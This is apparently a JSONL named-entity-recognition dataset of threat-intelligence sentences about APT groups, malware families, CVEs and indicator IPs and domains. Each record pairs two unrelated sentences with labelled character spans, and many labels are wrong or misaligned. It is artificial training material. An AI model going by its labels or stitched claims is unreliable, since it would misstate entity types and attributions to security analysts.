{"text": "Whitefly rely heavily on tools such as Mimikatz to obtain credentials . We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 39, "end": 47, "label": "System"}, {"start": 120, "end": 125, "label": "System"}, {"start": 126, "end": 134, "label": "Vulnerability"}, {"start": 182, "end": 193, "label": "Organization"}]}
{"text": "Using these credentials , the attackers are able to compromise more machines on the network and , from those machines , again obtain more credentials . Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 .", "spans": [{"start": 12, "end": 23, "label": "System"}, {"start": 162, "end": 168, "label": "Organization"}, {"start": 201, "end": 214, "label": "Vulnerability"}]}
{"text": "Whitefly usually attempts to remain within a targeted organization for long periods of time\u2014often months\u2014in order to steal large volumes of information . This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 191, "end": 198, "label": "Organization"}]}
{"text": "In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability CVE-2017-11882 in Microsoft Office .", "spans": [{"start": 47, "end": 71, "label": "System"}, {"start": 84, "end": 92, "label": "System"}, {"start": 95, "end": 112, "label": "System"}, {"start": 206, "end": 219, "label": "Vulnerability"}, {"start": 284, "end": 298, "label": "Vulnerability"}, {"start": 333, "end": 339, "label": "Organization"}, {"start": 393, "end": 407, "label": "Vulnerability"}, {"start": 411, "end": 420, "label": "Organization"}]}
{"text": "Like Vcrodat , Nibatad is also a loader that leverages search order hijacking , and downloads an encrypted payload to the infected computer . The other overlapping files are tools used by the adversary to locate other systems on the network ( etool.exe ) , check to see if they are vulnerable to CVE-2017-0144 ( EternalBlue ) patched in MS07-010 ( checker1.exe ) and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket ( psexec.exe ) .", "spans": [{"start": 5, "end": 12, "label": "System"}, {"start": 15, "end": 22, "label": "System"}, {"start": 243, "end": 252, "label": "Indicator"}, {"start": 296, "end": 309, "label": "Vulnerability"}, {"start": 312, "end": 323, "label": "Vulnerability"}, {"start": 337, "end": 345, "label": "Indicator"}, {"start": 348, "end": 360, "label": "Indicator"}, {"start": 447, "end": 453, "label": "System"}, {"start": 465, "end": 473, "label": "System"}, {"start": 476, "end": 486, "label": "Indicator"}]}
{"text": "Why Whitefly uses these two different loaders in some of its attacks remains unknown . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 ( EternalBlue ) that we saw uploaded to the other errr.aspx webshell .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 38, "end": 45, "label": "System"}, {"start": 150, "end": 163, "label": "Malware"}, {"start": 219, "end": 232, "label": "Vulnerability"}, {"start": 235, "end": 246, "label": "Vulnerability"}, {"start": 283, "end": 292, "label": "Indicator"}]}
{"text": "While Vcrodat is delivered via the malicious dropper , we have yet to discover how Nibatad is delivered to the infected computer . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 ( EternalBlue ) vulnerability patched in MS17-010 .", "spans": [{"start": 6, "end": 13, "label": "System"}, {"start": 45, "end": 52, "label": "System"}, {"start": 83, "end": 90, "label": "System"}, {"start": 146, "end": 152, "label": "Organization"}, {"start": 240, "end": 253, "label": "Vulnerability"}, {"start": 256, "end": 267, "label": "Vulnerability"}, {"start": 295, "end": 303, "label": "Indicator"}]}
{"text": "Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework .", "spans": [{"start": 88, "end": 96, "label": "Organization"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 155, "end": 161, "label": "Organization"}, {"start": 234, "end": 240, "label": "Indicator"}, {"start": 253, "end": 260, "label": "Vulnerability"}, {"start": 265, "end": 278, "label": "Vulnerability"}, {"start": 322, "end": 346, "label": "System"}]}
{"text": "In another case , Vcrodat was also used in an attack on a UK-based organization in the hospitality sector . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 87, "end": 105, "label": "Organization"}, {"start": 121, "end": 128, "label": "Organization"}, {"start": 135, "end": 144, "label": "Organization"}, {"start": 154, "end": 160, "label": "System"}, {"start": 204, "end": 211, "label": "Vulnerability"}, {"start": 212, "end": 228, "label": "Organization"}, {"start": 229, "end": 244, "label": "Vulnerability"}, {"start": 295, "end": 302, "label": "Malware"}]}
{"text": "Whitefly is a highly adept group with a large arsenal of tools at its disposal , capable of penetrating targeted organizations and maintaining a long-term presence on their networks . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 197, "end": 204, "label": "Organization"}, {"start": 211, "end": 220, "label": "Organization"}, {"start": 230, "end": 236, "label": "System"}, {"start": 280, "end": 287, "label": "Vulnerability"}, {"start": 288, "end": 304, "label": "Organization"}, {"start": 305, "end": 320, "label": "Vulnerability"}, {"start": 371, "end": 378, "label": "Malware"}]}
{"text": "WICKED PANDA has also targeted chemical and think tank sectors around the world . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 .", "spans": [{"start": 31, "end": 39, "label": "Organization"}, {"start": 44, "end": 54, "label": "Organization"}, {"start": 113, "end": 118, "label": "Organization"}, {"start": 147, "end": 155, "label": "Malware"}, {"start": 164, "end": 178, "label": "System"}, {"start": 181, "end": 185, "label": "Indicator"}, {"start": 211, "end": 224, "label": "Vulnerability"}]}
{"text": "The WICKED PANDA adversary makes use of a number of open-source and custom tools to infect and move laterally in victim networks . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 68, "end": 80, "label": "System"}, {"start": 135, "end": 147, "label": "Organization"}, {"start": 191, "end": 196, "label": "System"}, {"start": 197, "end": 205, "label": "Vulnerability"}, {"start": 223, "end": 230, "label": "Malware"}, {"start": 237, "end": 257, "label": "Malware"}]}
{"text": "WICKED PANDA refers to the targeted intrusion operations of the actor publicly known as \" Winnti \" , whereas WICKED SPIDER represents this group 's financially-motivated criminal activity . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 109, "end": 122, "label": "Organization"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 239, "end": 244, "label": "System"}, {"start": 245, "end": 253, "label": "Vulnerability"}, {"start": 271, "end": 278, "label": "Malware"}, {"start": 285, "end": 305, "label": "Malware"}]}
{"text": "WICKED SPIDER has been observed targeting technology companies in Germany , Indonesia , the Russian Federation , South Korea , Sweden , Thailand , Turkey , the United States , and elsewhere . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 42, "end": 62, "label": "Organization"}, {"start": 245, "end": 250, "label": "System"}, {"start": 251, "end": 259, "label": "Vulnerability"}, {"start": 277, "end": 284, "label": "Malware"}, {"start": 291, "end": 311, "label": "Malware"}]}
{"text": "Subsequently , two additional articles ( here and here ) were released by Objective-See which provide an analysis of some validated WINDSHIFT samples targeting OSX systems . APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": [{"start": 74, "end": 87, "label": "Organization"}, {"start": 132, "end": 149, "label": "System"}, {"start": 174, "end": 179, "label": "Organization"}, {"start": 220, "end": 231, "label": "Vulnerability"}, {"start": 232, "end": 240, "label": "Vulnerability"}, {"start": 249, "end": 265, "label": "Malware"}, {"start": 266, "end": 275, "label": "Malware"}]}
{"text": "Pivoting on specific file attributes and infrastructure indicators , Unit 42 was able to identify and correlate additional attacker activity and can now provide specific details on a targeted WINDSHIFT attack as it unfolded at a Middle Eastern government agency . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": [{"start": 69, "end": 76, "label": "Organization"}, {"start": 244, "end": 261, "label": "Organization"}, {"start": 268, "end": 276, "label": "Malware"}, {"start": 374, "end": 378, "label": "System"}, {"start": 379, "end": 387, "label": "Vulnerability"}, {"start": 390, "end": 403, "label": "Vulnerability"}]}
{"text": "The following is a summary of observed WINDSHIFT activity which targeted a Middle Eastern government agency . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": [{"start": 90, "end": 107, "label": "Organization"}, {"start": 174, "end": 187, "label": "Vulnerability"}, {"start": 198, "end": 206, "label": "Malware"}, {"start": 260, "end": 268, "label": "Vulnerability"}, {"start": 309, "end": 316, "label": "Vulnerability"}]}
{"text": "The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": [{"start": 4, "end": 30, "label": "Organization"}, {"start": 67, "end": 91, "label": "System"}, {"start": 94, "end": 101, "label": "Organization"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 166, "end": 174, "label": "Vulnerability"}, {"start": 175, "end": 186, "label": "System"}, {"start": 203, "end": 216, "label": "Vulnerability"}, {"start": 233, "end": 240, "label": "Malware"}, {"start": 241, "end": 248, "label": "Malware"}]}
{"text": "Whitefly configures multiple C&C domains for each target . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 59, "end": 86, "label": "Organization"}, {"start": 133, "end": 138, "label": "Organization"}, {"start": 151, "end": 159, "label": "Vulnerability"}, {"start": 160, "end": 171, "label": "System"}, {"start": 188, "end": 201, "label": "Vulnerability"}, {"start": 218, "end": 225, "label": "Malware"}, {"start": 226, "end": 233, "label": "Malware"}]}
{"text": "In some attacks , Whitefly has used a second piece of custom malware , Trojan.Nibatad . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": [{"start": 71, "end": 85, "label": "System"}, {"start": 193, "end": 201, "label": "Vulnerability"}, {"start": 202, "end": 209, "label": "Vulnerability"}, {"start": 335, "end": 346, "label": "Organization"}]}
{"text": "LUNAR SPIDER had already introduced BokBot to the criminal market at the time Neverquest operations ceased , suggesting that the malware change may have been planned . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 36, "end": 42, "label": "System"}, {"start": 198, "end": 214, "label": "Organization"}, {"start": 284, "end": 292, "label": "Vulnerability"}, {"start": 293, "end": 300, "label": "Vulnerability"}, {"start": 426, "end": 437, "label": "Organization"}]}
{"text": "Its origins can be traced back to the Storm Worm , a botnet that emerged in 2007 and was one of the earliest criminal malware infrastructures to leverage peer-to-peer technology . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 167, "end": 177, "label": "Organization"}, {"start": 180, "end": 189, "label": "Organization"}, {"start": 200, "end": 216, "label": "Organization"}, {"start": 234, "end": 252, "label": "System"}, {"start": 253, "end": 261, "label": "Vulnerability"}, {"start": 278, "end": 291, "label": "Vulnerability"}, {"start": 338, "end": 344, "label": "Malware"}]}
{"text": "After the demise of Storm , it was replaced by another new botnet known as Waledac that also leveraged peer-to-peer communications . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 75, "end": 82, "label": "System"}, {"start": 133, "end": 142, "label": "Organization"}, {"start": 176, "end": 194, "label": "System"}, {"start": 195, "end": 203, "label": "Vulnerability"}, {"start": 220, "end": 233, "label": "Vulnerability"}, {"start": 280, "end": 286, "label": "Malware"}]}
{"text": "Although BokBot has aided the distribution of TrickBot since 2017 , the development of custom TrickBot modules for the specific campaign has not been observed before . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": [{"start": 9, "end": 15, "label": "System"}, {"start": 46, "end": 54, "label": "System"}, {"start": 94, "end": 110, "label": "System"}, {"start": 168, "end": 181, "label": "Organization"}, {"start": 237, "end": 245, "label": "Vulnerability"}]}
{"text": "Kelihos , like many others , implemented a sophisticated spam engine that automatically constructs spam messages from templates and additional inputs to avoid any patterns that can be used in filters . The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 267, "end": 275, "label": "Vulnerability"}]}
{"text": "A second attack that targeted the host 154.46.32.129 started on March 14 , 2017 at 14:44:42 GMT . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": [{"start": 98, "end": 111, "label": "Organization"}, {"start": 130, "end": 136, "label": "System"}, {"start": 142, "end": 147, "label": "System"}, {"start": 194, "end": 200, "label": "Malware"}, {"start": 201, "end": 208, "label": "Malware"}, {"start": 234, "end": 239, "label": "System"}, {"start": 240, "end": 248, "label": "Vulnerability"}]}
{"text": "As shown within the timeline above , the WINDSHIFT activity observed by Unit 42 falls between January and May of 2018 . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": [{"start": 72, "end": 79, "label": "Organization"}, {"start": 148, "end": 154, "label": "System"}, {"start": 160, "end": 165, "label": "System"}, {"start": 212, "end": 218, "label": "Malware"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 252, "end": 257, "label": "System"}, {"start": 258, "end": 266, "label": "Vulnerability"}]}
{"text": "With the Kelihos spam botnet no longer in operation and Levashov behind bars , multiple criminal operators turned to different spam botnets to distribute their crimeware . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": [{"start": 9, "end": 28, "label": "System"}, {"start": 211, "end": 222, "label": "Organization"}, {"start": 234, "end": 247, "label": "Organization"}, {"start": 314, "end": 327, "label": "Vulnerability"}]}
{"text": "CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos . While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 68, "end": 73, "label": "System"}, {"start": 78, "end": 84, "label": "System"}, {"start": 251, "end": 262, "label": "Organization"}, {"start": 294, "end": 307, "label": "Organization"}, {"start": 374, "end": 387, "label": "Vulnerability"}]}
{"text": "The first attack occurred in early January of 2018 with an inbound WINDTAIL sample ( the backdoor family used by WINDSHIFT ) originating from the remote IP address 109.235.51.110 to a single internal IP address within the government agency . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data Exfiltration and to provide remote access to infected machines .", "spans": [{"start": 67, "end": 82, "label": "System"}, {"start": 113, "end": 122, "label": "System"}, {"start": 222, "end": 239, "label": "Organization"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 293, "end": 300, "label": "Malware"}]}
{"text": "Unit 42 assesses with high confidence that both the IP address 185.25.50.189 and the domain domforworld.com is associated with WINDSHIFT activity . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 180, "end": 188, "label": "Malware"}, {"start": 201, "end": 208, "label": "Vulnerability"}, {"start": 234, "end": 241, "label": "System"}, {"start": 247, "end": 254, "label": "System"}, {"start": 269, "end": 276, "label": "System"}, {"start": 285, "end": 292, "label": "System"}, {"start": 307, "end": 314, "label": "System"}, {"start": 319, "end": 326, "label": "System"}, {"start": 335, "end": 342, "label": "System"}, {"start": 357, "end": 370, "label": "Vulnerability"}]}
{"text": "The CrowdStrike Falcon Intelligence team , which had been tracking Levashov as the adversary called ZOMBIE SPIDER , was able to help law enforcement seize control of the Kelihos botnet so that it could no longer be used by criminal actors . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto .", "spans": [{"start": 4, "end": 35, "label": "Organization"}, {"start": 100, "end": 113, "label": "Organization"}, {"start": 298, "end": 321, "label": "Malware"}, {"start": 324, "end": 327, "label": "Malware"}, {"start": 332, "end": 340, "label": "Malware"}]}
{"text": "Over the past few years , Animal Farm has targeted a wide range of global organizations . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system .", "spans": [{"start": 26, "end": 37, "label": "Organization"}, {"start": 90, "end": 98, "label": "Malware"}]}
{"text": "The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007 . Sensitive bank documents have be found on the servers that were controlling Carbanak .", "spans": [{"start": 209, "end": 217, "label": "Malware"}]}
{"text": "Over the years Kaspersky is tracked multiple campaigns by the Animal Farm group . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa .", "spans": [{"start": 15, "end": 24, "label": "Organization"}, {"start": 62, "end": 79, "label": "Organization"}, {"start": 120, "end": 128, "label": "Malware"}, {"start": 129, "end": 138, "label": "Organization"}]}
{"text": "Most recently , Animal Farm deployed the Casper Trojan via a watering-hole attack in Syria . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": [{"start": 16, "end": 27, "label": "Organization"}, {"start": 41, "end": 54, "label": "System"}, {"start": 113, "end": 121, "label": "Malware"}, {"start": 188, "end": 197, "label": "Organization"}, {"start": 238, "end": 256, "label": "Organization"}, {"start": 280, "end": 289, "label": "Organization"}]}
{"text": "A full description of this zero-day attack can be found in this blog post by Kaspersky Lab 's Vyacheslav Zakorzhevsky . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies .", "spans": [{"start": 77, "end": 90, "label": "Organization"}, {"start": 192, "end": 200, "label": "Malware"}, {"start": 217, "end": 235, "label": "Organization"}, {"start": 246, "end": 263, "label": "Organization"}, {"start": 266, "end": 281, "label": "Organization"}, {"start": 286, "end": 298, "label": "Organization"}]}
{"text": "In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 135, "end": 140, "label": "Organization"}, {"start": 159, "end": 167, "label": "Malware"}, {"start": 235, "end": 243, "label": "Organization"}, {"start": 335, "end": 342, "label": "Malware"}]}
{"text": "The malware known as Tafacalou ( aka \" TFC \" , \" Transporter \" ) is perhaps of greatest interest here , because it acts as an entry point for the more sophisticated spy platforms Babar and Dino . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space .", "spans": [{"start": 21, "end": 30, "label": "System"}, {"start": 39, "end": 42, "label": "System"}, {"start": 49, "end": 60, "label": "System"}, {"start": 179, "end": 184, "label": "System"}, {"start": 189, "end": 193, "label": "System"}, {"start": 206, "end": 214, "label": "Malware"}, {"start": 251, "end": 256, "label": "Organization"}, {"start": 261, "end": 279, "label": "Organization"}, {"start": 321, "end": 326, "label": "Organization"}]}
{"text": "Based on the Tafacalou infection logs , we observed that most of the victims are in the following countries : Syria , Iran , Malaysia , USA , China , Turkey , Netherlands , Germany , Great Britain , Russia , Sweden , Austria , Algeria , Israel , Iraq , Morocco , New Zealand , Ukraine . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems .", "spans": [{"start": 13, "end": 22, "label": "System"}, {"start": 298, "end": 306, "label": "Malware"}, {"start": 366, "end": 371, "label": "Organization"}, {"start": 378, "end": 393, "label": "Organization"}]}
{"text": "In 2013 , both COSEINC and FireEye revealed attacks using Bisonal against Japanese organizations . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer .", "spans": [{"start": 15, "end": 22, "label": "Organization"}, {"start": 27, "end": 34, "label": "Organization"}, {"start": 58, "end": 65, "label": "System"}, {"start": 170, "end": 178, "label": "Malware"}, {"start": 273, "end": 283, "label": "Malware"}, {"start": 288, "end": 299, "label": "Malware"}]}
{"text": "In October 2017 , AhnLab published a report called \" Operation Bitter Biscuit \" , an attack campaign against South Korea , Japan , India and Russia using Bisonal and its successors , Bioazih and Dexbia . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research .", "spans": [{"start": 18, "end": 24, "label": "Organization"}, {"start": 154, "end": 161, "label": "System"}, {"start": 183, "end": 190, "label": "System"}, {"start": 195, "end": 201, "label": "System"}, {"start": 232, "end": 240, "label": "Malware"}, {"start": 274, "end": 279, "label": "Organization"}]}
{"text": "We observed all these characteristics in the Bisonal 's attacks against both Russia and South Korea . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider .", "spans": [{"start": 45, "end": 52, "label": "System"}, {"start": 130, "end": 145, "label": "Organization"}, {"start": 206, "end": 214, "label": "Organization"}, {"start": 250, "end": 258, "label": "Malware"}, {"start": 276, "end": 297, "label": "Organization"}, {"start": 310, "end": 323, "label": "Organization"}]}
{"text": "We observed all these characteristics in the Bisonal 's attacks against both Russia and South Korea . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police .", "spans": [{"start": 45, "end": 52, "label": "System"}, {"start": 120, "end": 130, "label": "Organization"}, {"start": 142, "end": 150, "label": "Malware"}, {"start": 199, "end": 221, "label": "Organization"}]}
{"text": "The biggest number of Orangeworm 's victims are located in the U.S. , accounting for 17 percent of the infection rate by region . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": [{"start": 147, "end": 162, "label": "Organization"}, {"start": 188, "end": 193, "label": "Organization"}, {"start": 196, "end": 205, "label": "Organization"}, {"start": 218, "end": 240, "label": "Organization"}, {"start": 290, "end": 298, "label": "Malware"}, {"start": 303, "end": 309, "label": "Malware"}]}
{"text": "In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent .", "spans": [{"start": 150, "end": 155, "label": "Malware"}, {"start": 189, "end": 200, "label": "Organization"}, {"start": 205, "end": 215, "label": "Malware"}, {"start": 291, "end": 298, "label": "Vulnerability"}, {"start": 338, "end": 346, "label": "Malware"}, {"start": 413, "end": 419, "label": "Malware"}, {"start": 424, "end": 434, "label": "Malware"}, {"start": 439, "end": 445, "label": "System"}]}
{"text": "Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd and exit.exe files , and , at the same time , some new components have been introduced , for instance the rtegre.exe and the veter1605_MAPS_10cr0.exe file . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries .", "spans": [{"start": 85, "end": 90, "label": "Malware"}, {"start": 95, "end": 103, "label": "Malware"}, {"start": 197, "end": 207, "label": "Malware"}, {"start": 216, "end": 240, "label": "Malware"}, {"start": 323, "end": 331, "label": "Malware"}, {"start": 336, "end": 355, "label": "Organization"}, {"start": 457, "end": 479, "label": "Organization"}]}
{"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 79, "end": 98, "label": "Malware"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 170, "end": 174, "label": "Organization"}, {"start": 208, "end": 216, "label": "Malware"}, {"start": 246, "end": 255, "label": "Organization"}]}
{"text": "The malware then uses WebDAV to upload the RAR archive to a Box account . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 22, "end": 28, "label": "System"}, {"start": 43, "end": 54, "label": "Malware"}, {"start": 103, "end": 111, "label": "Malware"}, {"start": 142, "end": 163, "label": "Organization"}]}
{"text": "The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": [{"start": 4, "end": 21, "label": "System"}, {"start": 81, "end": 100, "label": "Malware"}, {"start": 176, "end": 182, "label": "System"}, {"start": 188, "end": 212, "label": "Indicator"}, {"start": 224, "end": 237, "label": "Vulnerability"}]}
{"text": "McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 64, "end": 71, "label": "Organization"}, {"start": 193, "end": 211, "label": "Malware"}, {"start": 219, "end": 226, "label": "Organization"}, {"start": 255, "end": 263, "label": "Organization"}, {"start": 285, "end": 289, "label": "System"}, {"start": 290, "end": 298, "label": "Vulnerability"}, {"start": 315, "end": 328, "label": "Vulnerability"}, {"start": 374, "end": 388, "label": "Indicator"}, {"start": 391, "end": 404, "label": "Vulnerability"}, {"start": 411, "end": 427, "label": "Malware"}, {"start": 430, "end": 443, "label": "Vulnerability"}]}
{"text": "According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 .", "spans": [{"start": 22, "end": 52, "label": "Organization"}, {"start": 101, "end": 115, "label": "Malware"}, {"start": 257, "end": 262, "label": "System"}, {"start": 265, "end": 278, "label": "Vulnerability"}, {"start": 281, "end": 294, "label": "Vulnerability"}, {"start": 301, "end": 314, "label": "Vulnerability"}]}
{"text": "Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant .", "spans": [{"start": 13, "end": 22, "label": "Organization"}, {"start": 40, "end": 48, "label": "Malware"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 105, "end": 112, "label": "Vulnerability"}, {"start": 140, "end": 153, "label": "Vulnerability"}, {"start": 166, "end": 174, "label": "Organization"}]}
{"text": "Trend Micro also reported MuddyWater\u2019s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 26, "end": 38, "label": "Organization"}, {"start": 97, "end": 110, "label": "Malware"}, {"start": 113, "end": 122, "label": "Indicator"}, {"start": 132, "end": 137, "label": "System"}, {"start": 138, "end": 145, "label": "Vulnerability"}, {"start": 207, "end": 214, "label": "Vulnerability"}, {"start": 218, "end": 228, "label": "System"}]}
{"text": "ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 36, "end": 42, "label": "Malware"}, {"start": 52, "end": 62, "label": "Organization"}, {"start": 108, "end": 116, "label": "Malware"}, {"start": 126, "end": 137, "label": "Vulnerability"}, {"start": 159, "end": 162, "label": "Malware"}]}
